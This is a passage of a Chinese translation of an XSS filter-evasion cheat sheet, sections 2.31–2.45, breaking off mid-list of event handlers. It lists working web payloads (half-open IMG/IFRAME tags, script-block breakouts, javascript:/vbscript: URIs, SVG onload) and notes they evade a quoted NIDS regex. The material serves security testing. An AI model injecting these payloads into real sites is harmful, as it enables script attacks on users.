style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.31.    只含左尖括号的HTML/JavaScript XSS向量</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> IE渲染引擎不像Firefox,不会向页面中添加额外数据。但它允许在IMG标签中直接使用javascript。这对构造攻击向量是很有用的,因为不需要闭合尖括号。这使得有任何HTML标签都可以进行跨站脚本攻击向量注入。甚至可以不使用”>”闭合标签。注意:这会让HTML页面变得混乱,具体程度取决于下面的HTML标签。这可以绕过以下NIDS正则:/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/因为不需要”>”闭合。另外在实际对抗XSS过滤器的时候,使用一个半开放的<IFRAME标签替代<IMG标签也是非常有效的。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”javascript:alert(‘XSS’)”</p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.32.    多个左尖括号</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 使用一个左尖括号替代右尖括号作为标签结尾的攻击向量会在不同浏览器的Gecko渲染引擎下有不同表现。没有左尖括号时,在Firefox中生效,而在Netscape中无效。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <iframe src=http://xss.rocks/scriptlet.html <</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.33.    JavaScript双重转义</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 当应用将一些用户输入输出到例如:<SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT>的JavaScript中时,你想注入你的JavaScript脚本,你可以通过转义转义字符来规避服务器端转义引号。注入后会得到<SCRIPT>vara=”\\”;alert(‘XSS’);//”;</SCRIPT>,这时双引号不会被转义并且可以触发跨站脚本攻击向量。XSS定位器就用了这种方法:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> \”;alert(‘XSS’);//</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 另一种情况是,如果内嵌数据进行了正确的JSON或JavaScript转义,但没有HTML编码,那可以结束原有脚本块并开始你自己的:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> </script><script>alert(‘XSS’);</script></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.34.    闭合title标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是一个简单的闭合<TITLE>标签的XSS攻击向量,可以包含恶意的跨站脚本攻击:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> </TITLE><SCRIPT>alert(“XSS”);</SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.35.    INPUT image</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.36.    BODY image</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <BODY BACKGROUND=”javascript:alert(‘XSS’)”></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.37.    IMG Dynsrc</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG DYNSRC=”javascript:alert(‘XSS’)”></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.38.    IMG lowsrc</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG LOWSRC=”javascript:alert(‘XSS’)”></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.39.    List-style-image</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 处理嵌入的图片列表是很麻烦的问题。由于JavaScript指令的原因只能在IE渲染引擎下有效。不是一个特别有用的跨站脚本攻击向量:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.40.    图片中引用VBscript</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=’vbscript:msgbox(“XSS”)’></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.41.    Livescript (仅限旧版本Netscape)</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”livescript:[code]"></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.42.    SVG对象标签</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <svg/οnlοad=alert('XSS')></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.43.    ECMAScript 6</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> Set.constructor`alert\x28document.domain\x29```</p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.44.    BODY标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这个方法不需要使用任何例如"javascript:"或"<SCRIPT..."语句来完成XSS攻击。Dan Crowley特别提醒你可以在等号前加入一个空格("οnlοad=" != "onload ="):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <BODY ONLOAD=alert('XSS')></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.45.    事件处理程序</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 在XSS攻击中可使用以下事件(在完稿的时候这是网上最全的列表了)。感谢ReneLedosquet的更新。</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 1.    FSCommand() (攻击者当需要在嵌入的Flash对象中执行时可以使用此事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 2.    onAbort() (当用户中止加载图片时)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 3.    onActivate() (当对象激活时)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 4.    onAfterPrint() (用户打印或进行打印预览后触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 5.    onAfterUpdate() (从数据源对象更新数据后由数据对象触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 6.    onBeforeActivate() (在对象设置为激活元素前触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 7.    onBeforeCopy() (攻击者在选中部分拷贝到剪贴板前执行攻击代码-攻击者可以通过执行execCommand("Copy")函数触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 8.    onBeforeCut() (攻击者在选中部分剪切到剪贴板前执行攻击代码)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 9.    onBeforeDeactivate() (在当前对象的激活元素变化前触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 10.  onBeforeEditFocus() (在一个包含可编辑元素的对象进入激活状态时或一个可编辑的对象被选中时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 11.  onBeforePaste() (在用户被诱导进行粘贴前或使用execCommand("Paste")函数触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 12.  onBeforePrint() (用户需要被诱导进行打印或攻击者可以使用print()或execCommand("Print")函数).</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 13.  onBeforeUnload() (用户需要被诱导关闭浏览器-除非从父窗口执行,否则攻击者不能关闭当前窗口)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 14.  onBeforeUpdate() (从数据源对象更新数据前由数据对象触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 15.  onBegin() (当元素周期开始时由onbegin 事件立即触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 16.  onBlur() (另一个窗口弹出当前窗口失去焦点时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 17.  onBounce() (当marquee对象的behavior属性设置为“alternate”且字幕的滚动内容到达窗口一边时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 18.  onCellChange() (当数据提供者的数据变化时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 19.  onChange() (select,text, 或TEXTAREA字段失去焦点并且值发生变化时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 20.  onClick() (表单中点击触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 21.  onContextMenu() (用户需要在攻击区域点击右键)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 22.  onControlSelect() (当用户在一个对象上创建控件选中区时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 23.  onCopy() (用户需要复制一些东西或使用execCommand("Copy")命令时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 24.  onCut() (用户需要剪切一些东西或使用execCommand("Cut")命令时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 25.  onDataAvailable() (用户需要修改元素中的数据,或者由攻击者提供的类似功能)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 26.  onDataSetChanged() (当数据源对象变更导致数据集发生变更时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 27.  onDataSetComplete() (数据源对象中所有数据可用时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 28.  onDblClick() (用户双击一个表单元素或链接)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 29.  onDeactivate() (在激活元素从当前对象转换到父文档中的另一个对象时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 30.  onDrag() (在元素正在拖动时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 31.  onDragEnd() 